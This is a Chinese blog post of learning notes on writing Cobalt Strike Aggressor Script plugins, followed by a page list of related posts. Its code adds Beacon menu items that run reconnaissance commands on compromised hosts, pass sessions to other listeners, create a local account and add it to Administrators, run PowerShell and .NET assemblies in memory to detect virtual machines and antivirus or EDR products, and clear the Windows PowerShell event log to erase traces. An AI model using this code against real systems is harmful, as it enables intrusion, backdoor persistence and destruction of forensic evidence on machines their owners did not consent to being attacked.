CobaltStrike插件开发-learning-day4

最新推荐文章于 2024-05-12 03:51:24 发布
最新推荐文章于 2024-05-12 03:51:24 发布
阅读量798 收藏
点赞数 1
分类专栏: 安全工具开发 文章标签: CobaltStrike 插件开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/115012766
版权

目录

CobaltStrike插件开发的几个场景

指定Beacon执行系统命令

上线目标会话传递

交互式操作

执行powershell命令

加载powershell,传参

加载exe,传参

 

CobaltStrike插件开发的几个场景

指定Beacon执行系统命令

bshell($1,"whoami");

$1为当前beacon的id

具体弹框出来看一下:show_message($1) 每个会话都是随机的

模拟一个简单的场景,实现上线用户信息的查看,code如下,注意以下三种写法都可

sub showuser {
    show_message($1);
	bshell($1, "query user");
}
popup beacon_bottom {
    menu "查看用户信息"{
	item "查看当前用户" {
	bshell($1, "whoami");
	};
	separator();
	item("&查看计算机用户",{bshell($1, "net user");});
	item("&查看在线用户",{showuser($1);});
	}
	
}

效果如下:

点击第三个选项:弹出会话id,然后在beacon中显示命令执行后的结果

上线目标会话传递

	item("&会话传递",{openPayloadHelper(lambda({bspawn($bid, $1);
  	println("我们传递的监听器是".$1."需要传递的会话id为".$bid)},$bid => $1));

交互式操作

测试一下参数传递是否正常

sub dialog_input {
    #第一行设置标题以及回调函数
    show_message($1);
	$dialog = dialog("添加用户", %(username => "admin",password => "root",bid => $1),&show);  
	drow_text($dialog,"username","请输入用户名:");  #用户名输入框
	drow_text($dialog,"password","请输入密码:");    #密码输入框
	dbutton_action($dialog, "确定");   #确定按钮,当点击了该按钮,就会调用回调函数
	dialog_show($dialog);    #显示对话框
}
sub show{
    show_message("输入的用户名:".$3['username']."输入的密码: ".$3['password']." 会话id为: ".$3['bid']);
}

添加用户实现

sub dialog_input {
    #第一行设置标题以及回调函数
    $bid = $1['@'];#拿出数组的第一个元素
	$dialog = dialog("添加用户", %(username => "admin",password => "root",bid => $bid),&show);  
	drow_text($dialog,"username","请输入用户名:");  #用户名输入框
	drow_text($dialog,"password","请输入密码:");    #密码输入框
	dbutton_action($dialog, "确定");   #确定按钮,当点击了该按钮,就会调用回调函数
	dialog_show($dialog);    #显示对话框
}
#回调函数
sub show{
	#bshell($bid, "net user $3['username'] $3['password'] /add");
	#bshell($bid, "net localgroup administrators $3['username'] /add");
	#bshell($bid, "net localgroup administrators");
	bshell($3['bid'], "net user $3['username'] $3['password'] /add");
	bshell($3['bid'], "net localgroup administrators $3['username'] /add");
	bshell($3['bid'], "net localgroup administrators");
}

 

执行powershell命令

bpowerpick($1,"需要执行的系统命令");

code:

item("&执行powershell命令(查看powershell执行策略)",{bpowerpick($1,"get-Executionpolicy");});

 

执行结果

 

加载powershell,传参

bpowershell_import($bid,script_resource("powershell路径"));

bpowerpick($bid,"powershell里面的自定义的函数");

	item("&检测是否为虚拟机",{
	    bpowershell_import($1, script_resource("/Check-VM.ps1"));
            bpowerpick($1,"Check-VM");
            bshell($1,"wevtutil cl \"Windows PowerShell\"");
	});

后续继续补充,未完待续

加载exe,传参

bexecute_assembly($1, script_resource('exe路径'), "追加的命令");

bexecute_assembly($1, script_resource('/SharpCheckInfo.exe'), "-AvProcessEDRproduct");

 

后续继续补充,未完待续

参考:

https://mp.weixin.qq.com/s/i7QzwMAmUyxoBs0CwcGC-g

 

 

 

Adsatrtgo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
.net core 调用c dll_从内存加载.NET程序集(Assembly.Load)的利用分析
weixin_39954908的博客
11-23 1410
0x00 前言在之前的文章《从内存加载.NET程序集(execute-assembly)的利用分析》介绍了"execute-assembly"的实现方法和利用思路,能够从内存中加载.NET程序集。这个功能不需要向硬盘写入文件,十分隐蔽。与此相似的方法还有一个是Assembly.Load,同样能够从内存中加载.NET程序集。本文将会结合三个开源工程,介绍Assembly.Load的实现方...
【CS学习笔记】10、如何管理Payload载荷
TeamsSix 的 CSDN 空间
06-27 984
0x00 前言 到目前为止,已经学过了如何在有漏洞的目标上获取立足点的方法,接下来将继续学习后渗透相关的知识,这一节就来学习学习 beacon 的管理、会话传递等。 0x01 Beacon 的管理 Beacon 控制台 在一个 Beacon 会话上右击 interact(交互)即可打开 Beacon 控制台,如果想对多个会话进行控制,也只需选中多个会话,执行相关功能即可。 在 Beacon 的控制台中的输入与输出之间,是一个状态栏,状态栏上的信息分别是:目标 NetBIOS 名称、用户名、会话PID以及
内网渗透神器CobaltStrike之execute-assembly(十三)
xf555er的博客
08-21 868
"execute-assembly"是Cobalt Strike的一项功能,它允许你在Cobalt Strike的Beacon控制的目标机器上直接执行.NET程序集(Assembly)。具体来说,这个功能通过在目标机器的内存中加载.NET程序集并执行它,而不需要将程序集写入到磁盘。这种在内存中执行程序的方法也被称为"文件无(fileless)"攻击,因为它能避免在磁盘上留下可疑的文件,从而绕过某些基于文件扫描的防御手段。
cobalt strike从入门到精通之开发(二)
风炫的博客
04-03 962
cobalt strike开发(二) 更多安全文章请关注! 0x05 监听器 监听器(Listeners)是Cobalt Strike处理bot发来的信息的核心模块。 0x0501 监听器API agscript会收集来自连接到的当前团队服务器的监听器的信息,这样做的好处是可以轻松地将会话转移给另一台团队服务器,想要获取所有监听器名称的列表可以使用&listeners函数,只使用本地侦听器的话用&listeners_local函数,&listener_info函数可将监听器名称解析为其配置信息,dem
2024年网络安全最新Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4,网络安全开发真等于废人
最新发布
2401_84302628的博客
05-12 1285
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
工具开发CobaltStrike件编写入门(三)
weixin_42282189的博客
12-09 1323
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 引言 之前发了两篇关于cs件编写的基础文章,写的是杀软判断的功能,用到的都是sleep脚本基础语法,这次想写一篇关于sleep脚本的高级用法的文章,那就是使用sleep脚本调用java对象。 本篇主要用sleep脚本调用java对象来实现一个powershell_encoder的功能。 项目源码:https://github.com/gooderbrother/Sleep_powershell_encoder .
cn-deep-learning-vs-machine-learning-ebook(1).pdf
09-20
cn-deep-learning-vs-machine-learning-ebook(1)
Q-Learning算法 Matlab代码实现
11-28
一个简单的Q-Learning算法的综合示例,可以在Matlab仿真平台上实现。
e-learning与知识管理概述.pptx
05-12
【e-learning概述】 e-learning,即电子学习,是一种利用互联网技术进行远程教育和培训的方式。它打破了传统教室的局限,让学习者可以在任何时间、任何地点进行自我学习,极大地提升了学习的灵活性和便利性。e-...
springboot-learning-examples:Spring Boot入门
04-29
springboot学习示例 Spring Boot入门
经典Q-learning代码-迷宫
01-21
Q-learning是一种强化学习算法,是基于贝尔曼最优方程的迭代方法,用于寻找一个智能体在给定环境中的最优策略。在这个案例中,我们将探讨如何使用MATLAB实现Q-learning来解决一个迷宫问题。 首先,我们需要理解迷宫...
Cobaltstrike学习(二)beacon命令
kang_12358的博客
07-20 5890
Cobaltstrike学习(二)beacon命令 1.Beacon命令 在已经上线的服务器上右击==>打开Beacon,在里面可以执行各种命令 在cs中默认的心跳时间是60s,我们可以用sleep 命令来更改心跳时间(心跳时间是指上线的服务器和cs服务器的通信时间) 心跳时间很长就会响应的时间很慢,但也不能设置的很短,不让很容易会被监测到与cs通信的流量,具体多少可以根据测试环境自己来设置。 在Beacon中执行cmd命令时需要在前面加上shell,例如:shell whoami.
CS件——CobaltStrike_CNA-权限维持
2301_76786857的博客
12-08 1464
EasyPersistent,是一个用于windows系统上权限维持的Cobalt Strike CNA 脚本。脚本整合了一些常用的权限维持方法,使用反射DLL模块可使用API对系统服务、计划任务等常见权限维持方法进行可视化操作(强烈建议使用白名单进程进行操作)。
Cobalt Strike第五篇导入
千寻的博客
02-16 5304
CobaltStrike有两种加载件的方法,一种是在客户端加载,一种是在服务端加载。在客户端加载,当客户端没连接上服务端后,该件即不会被加载。
CobaltStrike 件编写入门教程
weixin_42282189的博客
09-08 1128
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 简介 这篇文章主要以写一个判断beacon中存在的杀软进程脚本为例子来介绍如何去尝试从零开始写一个cobaltstrike件。 cobaltstrike中aggressor-script是建立在sleep脚本之上,本篇文章涉及简单的sleep脚本基础,和cobaltstrike内置函数和事件的调用。 先看效果: 参考链接: https://www.cobaltstrike.com/aggressor-scri.
Cobalt Strike 件CrossC2(小白教程)
m0_63239459的博客
03-10 1777
cobaltstrike件加载crossc2
内网渗透工具CobaltStrike使用教程详解
qq_50854662的博客
12-15 2359
内网渗透工具CobaltStrike使用教程详解
CobaltStrike的使用
weixin_44110913的博客
07-29 5838
目录 CobaltStrike CobaltStrike的安装 CobaltStrike的使用 CobaltStrike模块 创建监听器Listener 创建攻击Attacks HTML Application MS Office Macro Payload Generator Windows Executable & Windows Executable(S)  Web Drive-by&...
渗透测试-CNA_Bshell程序
aming小老弟
08-28 457
ladon&cobalt
double q-learning和q-learning有什么区别
04-29
Q-learning和Double Q-learning都是基于Q-learning算法的改进版本,主要是为了解决Q-learning算法的过度估计问题。 Q-learning算法是一种基于贪心策略的强化学习算法,它通过更新Q值来学习最优策略。然而,Q-learning算法中使用的贪心策略会导致过度估计问题,即在更新Q值时会高估某些动作的价值,从而导致学习到的策略不够优秀。 Double Q-learning是一种解决过度估计问题的方法。它使用两个独立的Q函数来评估每个动作的价值,并交替使用它们来更新Q值。这样可以避免对某些动作的价值高估,从而得到更好的策略。 因此,Double Q-learning相对于Q-learning的主要区别在于其使用了两个Q函数来评估每个动作的价值,并交替使用它们来更新Q值,从而解决过度估计问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值